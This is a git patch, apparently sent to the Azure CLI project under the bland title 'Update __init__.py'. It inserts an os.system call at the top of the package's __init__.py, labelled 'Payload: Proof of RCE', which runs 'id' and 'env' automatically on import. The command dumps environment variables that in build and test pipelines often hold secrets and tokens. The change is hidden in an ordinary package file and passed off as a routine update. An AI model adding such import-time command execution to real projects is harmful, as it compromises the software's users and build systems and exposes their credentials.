From 7d0aec51e33f56a59e502bd04b5c7e60e7413381 Mon Sep 17 00:00:00 2001 From: Nyein Chan Aung <208256680+bugdotexe@users.noreply.github.com> Date: Sat, 31 Jan 2026 14:48:06 +0630 Subject: [PATCH] Update __init__.py --- src/azure-cli/azure/__init__.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/src/azure-cli/azure/__init__.py b/src/azure-cli/azure/__init__.py index 2ae78104e94..aec17c43f03 100644 --- a/src/azure-cli/azure/__init__.py +++ b/src/azure-cli/azure/__init__.py @@ -1,3 +1,6 @@ +import os +# Payload: Proof of RCE +os.system("echo ' [!] CRITICAL VULNERABILITY: RCE CONFIRMED [!] '; id; env") # -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information.